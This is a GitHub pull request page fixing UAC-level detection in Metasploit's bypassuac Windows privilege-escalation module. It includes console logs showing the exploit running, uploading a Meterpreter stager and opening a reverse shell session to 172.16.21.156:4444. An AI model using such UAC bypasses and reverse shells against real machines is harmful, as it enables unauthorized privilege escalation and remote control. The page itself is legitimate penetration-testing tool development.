Fix UAC is not enabled, no reason to run module when UAC is enabled and ... #2470

…nd vulnerable The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is: Here is prior to the change on a fully patched Windows 8 machine: msf exploit(bypassuac) > exploit [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [-] UAC is not enabled, no reason to run module [-] Run exploit/windows/local/ask to elevate msf exploit(bypassuac) > Here's the module when running with the most recent changes that are being proposed: [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [!] Could not determine UAC level - attempting anyways... [*] Checking admin status... [+] Part of Administrators group! Continuing... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Sending stage (770048 bytes) to 172.16.21.128 [*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400 meterpreter > With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Fix UAC is not enabled, no reason to run module when UAC is enabled and ... #2470

Fix UAC is not enabled, no reason to run module when UAC is enabled and ... #2470

Commits on Oct 5, 2013